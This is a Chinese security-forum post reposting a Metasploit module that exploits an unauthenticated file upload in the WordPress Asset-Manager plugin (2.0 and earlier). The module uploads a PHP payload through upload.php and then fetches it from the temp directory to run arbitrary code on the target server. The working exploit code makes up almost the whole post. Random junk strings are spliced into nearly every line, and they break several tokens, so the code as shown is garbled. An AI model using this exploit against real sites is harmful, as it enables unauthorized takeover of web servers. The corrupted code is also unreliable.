中国网络渗透测试联盟

标题: WordPress Asset-Manager PHP文件上传漏洞 [打印本页]
作者: admin    时间: 2012-12-31 09:22
标题: WordPress Asset-Manager PHP文件上传漏洞
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。# J7 V3 _7 v3 Q2 B. x

3 p- z4 g- F  j3 W1 n% F' Z##* v' O5 W7 G3 ~
# This file is part of the Metasploit Framework and may be subject to
, }4 k+ P4 J. q$ h% g& h& N+ w) d# redistribution and commercial restrictions. Please see the Metasploit
" U  i/ M, M5 d7 g- R2 k# Framework web site for more information on licensing and terms of use.
  S' k0 W, P) Q% f. {! {; f' T! |#   http://metasploit.com/framework/
/ K1 B1 {$ W6 \. g##
5 _. F# L. t0 D7 f
  y% M$ O& d7 ?# z1 \% ]* d, Zrequire 'msf/core'6 P. \8 a! z) f/ ?( {
require 'msf/core/exploit/php_exe'
; _" z3 O" ?$ p! S8 O& t- V
: w9 w' O9 M1 e; |7 nclass Metasploit3 < Msf::Exploit::Remote
+ J+ i! z& ]  p/ M' n+ E  Rank = ExcellentRanking% s7 W9 ^+ W7 S: n" t% j

( z5 s& G/ h% B/ o* b  include Msf::Exploit::Remote::HttpClient3 O' _/ q6 }6 |% f
  include Msf::Exploit:hpEXE
- `/ W8 w. Z  P) ?" l - L" t" J. U. X/ H
  def initialize(info = {})1 X+ Q- X5 M! C+ E- W( a1 f+ @
    super(update_info(info,
) f/ O% w( v& j+ j7 M& \      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',/ S7 C5 `9 c( W' p' q- Z, F
      'Description'    => %q{
4 n$ W- N7 `2 j8 ]$ [" Q        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
' x6 M5 a% k  |7 A        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
2 ~: H  ]+ Q4 s3 g- }& L* f        temp directory without authentication, which results in arbitrary code execution.) p  u  N# J5 p+ o& T3 j
      },9 r0 e$ l! {" v6 d
      'Author'         =>
/ I3 t7 K* t6 O- m. h        [
* ^# P  z& ]8 L; J          'Sammy FORGIT', # initial discovery( [" p9 Q% G7 K5 r
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module1 s$ g( R6 R3 r/ C
        ],
) Z0 x. w  W( S% p3 f      'License'        => MSF_LICENSE,. ~" t* c, _9 \
      'References'     =>5 @0 }6 i( U) i) _6 l
        [2 i* E) f0 ]# {% }2 D& {
          [ 'OSVDB', '82653' ],
0 s$ g6 n2 _5 J! `& J' h          [ 'BID', '53809' ],
8 Y. H+ O: w" }2 r* R% U          [ 'EDB', '18993' ],
6 j( S9 \0 h2 `- x( ]          [ 'URL', 'http:// www.myhack58.com /' ]
2 _+ [2 `" A+ r. o& T        ],
1 w9 ?! T) C  k# J3 P) Z      'Payload'       =>
; n$ Y. Y8 Z) z5 u        {1 k: S6 g& O, r5 y6 C7 B# U
          'BadChars' => "\x00",' S0 W( g$ t! B0 c# y
        },( R! {0 F4 j+ c% l
      'Platform'       => 'php',5 v, }) ]* k1 }# Z
      'Arch'           => ARCH_PHP,
) p1 s. p# u+ d7 `, t9 @      'Targets'        =>
- @5 t% ^9 o0 M) [4 T. r        [) l3 \9 d( M% K7 a2 E
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],3 \6 t. |8 v- q
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], A, {& I6 u+ A5 K" ~- I8 L7 Y
        ],  S5 o* `8 e1 V! v( p% q3 C* X* G
      'DefaultTarget' => 0,7 y- [  T2 C7 q. h- k4 ]; I
      'DisclosureDate' => 'May 26 2012'))
. k4 s9 i  j5 X/ ]: x6 _
- n5 ?; y/ ^2 W    register_options(% g# X! h- q# m) d
      [9 S: t# Z1 t. k5 x9 r- i
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])1 O) y7 ~/ ]2 S6 H
      ], self.class)- o0 E/ K) m; N6 |+ c, a4 ?( A
  end
7 a; @% K$ y, O2 y! X4 } & e7 t$ m; k& z6 |% q& o
  def exploit) I  `: L% ]8 L& ?, H5 @
    uri =  target_uri.path+ }. k5 |+ k# s6 Y9 j* d" P% c
    uri << '/' if uri[-1,1] != '/'# |; N( m2 C) Q$ Y
    peer = "#{rhost}:#{rport}"3 ]/ e, P' o# g* h# t" M/ s
    payload_name = "#{rand_text_alpha(5)}.php"
3 `3 |5 a5 {) g/ A) T    php_payload = get_write_exec_payload(:unlink_self=>true)% ^9 @* \4 ?) I9 d* ^  b

1 h! S) g% a0 u5 F    data = Rex::MIME::Message.new1 \1 h' A  e; n& ?
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
" t6 N- U) m) z( e+ e2 ]7 J. J9 U    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'): r& t' ?  O7 t: `8 e4 h: h
( A3 H9 t8 j& j% h4 G7 f
    print_status("#{peer} - Uploading payload #{payload_name}")
' c6 ?3 K. D! g/ W    res = send_request_cgi({, r. g* r) P1 p, _( s+ c$ M1 @5 {
      'method'  => 'POST',2 ~* D# e% _: [5 w" p- a
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
/ ~$ h# {3 m: k, q- T) u3 [      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
8 k) k( `5 r4 d      'data'    => post_data
4 t4 Y0 t) p0 L! W/ H' `    })1 Y* M. @5 P/ l( n- `# P; r
+ F0 z2 `9 T3 y
    if not res or res.code != 200 or res.body !~ /#{payload_name}/# s' }( m+ Z7 S, n* l8 C3 d
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")" G, h: A7 \) l( A' N& [7 O
end
: u" }) @0 q# K% g$ }2 p0 \
5 G9 H/ A/ s  \9 N" y    print_status("#{peer} - Executing payload #{payload_name}"); L% _# _$ \! S) o# O
    res = send_request_raw({
, Y8 N+ g% K4 e4 ]      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",8 t( U. Q' j5 v
      'method'  => 'GET'
9 ]' J$ E+ _# H" g( p) ~2 e& B    })8 g* _# q1 O! j- z: p5 [2 r
" ^# C8 K2 u% N9 B
    if res and res.code != 2007 e3 U8 q3 E" a( A
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")1 N  K0 R# \3 _! F
    end
) A1 k( I9 Q  p  e  end( R% C  L$ H+ J1 L* ?1 Z
end) f; |7 }7 j) W8 B# n




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2